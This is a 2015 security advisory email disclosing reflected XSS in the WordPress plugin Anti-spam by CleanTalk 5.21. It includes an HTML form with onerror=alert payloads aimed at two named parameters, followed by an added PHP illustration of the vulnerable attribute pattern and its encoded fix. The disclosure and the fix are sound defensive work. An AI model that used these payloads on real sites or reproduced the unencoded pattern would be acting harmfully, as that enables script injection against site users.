Subject: Reflected Cross-Site Scripting (XSS) in Anti-spam by CleanTalk 5.21
Date: Tue, 25 Aug 2015 21:05:41 +0200

Hello,

Plugin: Anti-spam by CleanTalk 5.21 https://wordpress.org/plugins/cleantalk-spam-protect/

1. Reflected Cross-Site Scripting (XSS)

Unauthenticated users can inject HTML/JS.

Method: POST
URL: http://localhost/
Vulnerable parameters: cleantalk_hidden_method, cleantalk_hidden_action

Example PHP callstack:
ct_init   [/cleantalk-spam-protect/cleantalk-public.php:47]

Verification:
--
<form method="POST" action="http://localhost/">
<input type="text" name="cleantalk_hidden_method" value="'><img src=x onerror=alert(1) />" />
<input type="text" name="cleantalk_hidden_action" value="'><img src=x onerror=alert(2) />" />
<input type="submit" name="submit">
</form>
--


--
Regards,
Marcin Probola,
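
Added example, not part of the original report and not the plugin's code: a hypothetical PHP handler that reflects a POST parameter into a single-quoted attribute, next to a version that encodes it for the attribute context. The single-quoted sink is an assumption inferred from the `'>` prefix in the verification form; the function names and markup are hypothetical.

```php
<?php
// Added illustration; NOT the CleanTalk plugin's code. The markup and the
// function names are hypothetical. Assumption: the value is reflected inside
// a single-quoted HTML attribute, as the "'>" prefix in the report suggests.

// Vulnerable pattern: request data concatenated into the attribute unencoded.
function render_hidden_vulnerable(string $name, array $post): string
{
    $value = $post[$name] ?? '';
    return "<input type='hidden' name='" . $name . "' value='" . $value . "' />";
}

// Hardened pattern: encode for the attribute context. ENT_QUOTES is required
// because the attribute is single-quoted; without it "'" passes through.
// In WordPress code the equivalent call is esc_attr().
function render_hidden_hardened(string $name, array $post): string
{
    $value = $post[$name] ?? '';
    if (!is_string($value)) {   // e.g. param[]=x arrives as an array
        $value = '';
    }
    $encoded = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<input type='hidden' name='" . $name . "' value='" . $encoded . "' />";
}

// Constructed sample input: the value from the report's verification form.
$post = ['cleantalk_hidden_method' => "'><img src=x onerror=alert(1) />"];

$bad  = render_hidden_vulnerable('cleantalk_hidden_method', $post);
$good = render_hidden_hardened('cleantalk_hidden_method', $post);

// Vulnerable output: the quote closes the attribute and a new <img> tag appears.
echo $bad, PHP_EOL;
// Hardened output: ' < > are entity-encoded, so the value stays in the attribute.
echo $good, PHP_EOL;

// Regression check: no raw tag from the input survives in the hardened output.
if (strpos($good, '<img') !== false
    || strpos($good, '&#039;&gt;&lt;img') === false) {
    throw new RuntimeException('attribute encoding regression');
}
```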